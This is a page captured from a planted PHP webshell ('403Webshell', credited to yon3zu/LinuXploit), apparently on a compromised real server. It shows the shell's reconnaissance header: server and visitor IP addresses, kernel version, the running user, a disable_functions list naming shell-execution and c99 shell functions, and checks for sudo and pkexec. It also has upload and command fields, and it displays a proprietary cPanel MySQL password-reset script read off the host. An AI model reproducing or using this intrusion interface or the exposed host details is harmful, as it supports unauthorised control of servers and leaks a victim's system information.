403Webshell
Server IP : 103.119.228.120  /  Your IP : 3.149.250.65
Web Server : Apache
System : Linux v8.techscape8.com 3.10.0-1160.119.1.el7.tuxcare.els2.x86_64 #1 SMP Mon Jul 15 12:09:18 UTC 2024 x86_64
User : nobody ( 99)
PHP Version : 5.6.40
Disable Function : shell_exec,symlink,system,exec,proc_get_status,proc_nice,proc_terminate,define_syslog_variables,syslog,openlog,closelog,escapeshellcmd,passthru,ocinum cols,ini_alter,leak,listen,chgrp,apache_note,apache_setenv,debugger_on,debugger_off,ftp_exec,dl,dll,myshellexec,proc_open,socket_bind,proc_close,escapeshellarg,parse_ini_filepopen,fpassthru,exec,passthru,escapeshellarg,escapeshellcmd,proc_close,proc_open,ini_alter,popen,show_source,proc_nice,proc_terminate,proc_get_status,proc_close,pfsockopen,leak,apache_child_terminate,posix_kill,posix_mkfifo,posix_setpgid,posix_setsid,posix_setuid,dl,symlink,shell_exec,system,dl,passthru,escapeshellarg,escapeshellcmd,myshellexec,c99_buff_prepare,c99_sess_put,fpassthru,getdisfunc,fx29exec,fx29exec2,is_windows,disp_freespace,fx29sh_getupdate,fx29_buff_prepare,fx29_sess_put,fx29shexit,fx29fsearch,fx29ftpbrutecheck,fx29sh_tools,fx29sh_about,milw0rm,imagez,sh_name,myshellexec,checkproxyhost,dosyayicek,c99_buff_prepare,c99_sess_put,c99getsource,c99sh_getupdate,c99fsearch,c99shexit,view_perms,posix_getpwuid,posix_getgrgid,posix_kill,parse_perms,parsesort,view_perms_color,set_encoder_input,ls_setcheckboxall,ls_reverse_all,rsg_read,rsg_glob,selfURL,dispsecinfo,unix2DosTime,addFile,system,get_users,view_size,DirFiles,DirFilesWide,DirPrintHTMLHeaders,GetFilesTotal,GetTitles,GetTimeTotal,GetMatchesCount,GetFileMatchesCount,GetResultFiles,fs_copy_dir,fs_copy_obj,fs_move_dir,fs_move_obj,fs_rmdir,SearchText,getmicrotime
MySQL : ON |  cURL : ON |  WGET : ON |  Perl : ON |  Python : ON |  Sudo : ON |  Pkexec : ON
Directory :  /scripts/

Upload File :
current_dir [ Writeable] document_root [ Writeable]

 

Command :


[ Back ]     

Current File : /scripts/mysqlpasswd
#!/usr/local/cpanel/3rdparty/bin/perl

# cpanel - scripts/mysqlpasswd                     Copyright 2022 cPanel, L.L.C.
#                                                           All rights reserved.
# copyright@cpanel.net                                         http://cpanel.net
# This code is subject to the cPanel license. Unauthorized copying is prohibited

package scripts::mysqlpasswd;

use strict;
use warnings;
use Cpanel::MysqlUtils::Connect          ();
use Cpanel::MysqlUtils::Quote            ();
use Cpanel::MysqlUtils::MyCnf::Basic     ();
use Cpanel::MysqlUtils::Compat::Password ();
use Cpanel::ServerTasks                  ();

if ( $> != 0 ) {
    die "Setting MySQL passwords is only possible using the root account\n";
}

if ( !caller() ) {
    alarm(15);
    my ( $_user, $_pass, $_userhost );
    if ( grep( /--multistdin/, @ARGV ) ) {
        $_user = <STDIN>;
        chomp($_user);
        $_pass = <STDIN>;
        chomp($_pass);
        $_userhost = <STDIN>;
        chomp($_userhost);
    }
    elsif ( !@ARGV ) {
        chomp( my $up = <STDIN> );
        my @UP = split( / /, $up );
        $_user     = $UP[0];
        $_pass     = $UP[1];
        $_userhost = $UP[2];
    }
    else {
        $_user     = $ARGV[0];
        $_pass     = $ARGV[1];
        $_userhost = $ARGV[2];
    }
    alarm(0);

    if ( !$_user ) { print STDERR "$0: user is blank\n"; exit 1; }
    if ( !$_pass ) { print STDERR "$0: pass is blank\n"; exit 1; }

    exit __PACKAGE__->script( $_user, $_pass, $_userhost );
}

sub script {
    my ( $class, $user, $pass, $userhost ) = @_;

    die "Need user!\n" if !length $user;
    die "Need pass!\n" if !length $pass;

    my $quoted_user;
    if ( $user eq 'root' ) {
        my $dbuser = Cpanel::MysqlUtils::MyCnf::Basic::getmydbuser('root') || 'root';
        $quoted_user = Cpanel::MysqlUtils::Quote::quote($dbuser);
    }
    else {
        $quoted_user = Cpanel::MysqlUtils::Quote::quote($user);
    }
    my $quoted_pass     = Cpanel::MysqlUtils::Quote::quote($pass);
    my $quoted_userhost = Cpanel::MysqlUtils::Quote::quote($userhost);

    my $cpuser = $user;
    if ( $user ne 'root' ) {

        require Cpanel::DB::Map::Utils;
        $cpuser = Cpanel::DB::Map::Utils::get_cpuser_for_engine_dbuser( 'MYSQL', $user );
    }

    if ( !set_mysql_password_via_dbi( $quoted_user, $quoted_pass, ( length $userhost ? $quoted_userhost : () ) ) ) {
        return 1;
    }

    if ( $user eq 'root' ) {
        require Cpanel::MysqlUtils::RootPassword;
        Cpanel::MysqlUtils::RootPassword::update_mysql_root_password_in_configuration($pass);
    }
    elsif ($cpuser) {

        # We do not store grants for root, and this will
        # throw in queueprocd if we try.
        queue_dbstoregrants($cpuser);
    }

    return 0;
}

sub set_mysql_password_via_dbi {
    my ( $quoted_user, $quoted_pass, $quoted_userhost ) = @_;

    my $dbi = Cpanel::MysqlUtils::Connect::get_dbi_handle();

    my $reset_password_sql = Cpanel::MysqlUtils::Compat::Password::get_set_user_password_sql(
        dbh             => $dbi,
        quoted_user     => $quoted_user,
        quoted_password => $quoted_pass,
        ( length $quoted_userhost ? ( quoted_host => $quoted_userhost ) : () )
    );

    return _do_client( $reset_password_sql, $dbi );
}

# For tests
sub _do_client {
    my ( $reset_password_sql, $dbi ) = @_;

    # We used to do this via the “mysql” binary, but now that
    # we can use DBI directly we should do that. Moreover, it’s
    # necessary insofar as @$reset_password_sql might have stuff
    # like procedure definitions, which break if given directly to
    # the “mysql” binary. (See Cpanel::MysqlUtils::Compat::Password
    # and COBRA-7290.)

    my $ok = eval {
        foreach my $query (@$reset_password_sql) {
            $dbi->do($query) if ( length $query );
        }
        $dbi->do('FLUSH PRIVILEGES');

        1;
    };

    if ( !$ok ) {
        warn "Failed to set password via client: $@";
        return 0;
    }

    return 1;
}

sub queue_dbstoregrants {
    my $cpuser = shift;

    return Cpanel::ServerTasks::queue_task( ['MysqlTasks'], "dbstoregrants $cpuser" );
}

1;

Youez - 2016 - github.com/yon3zu
LinuXploit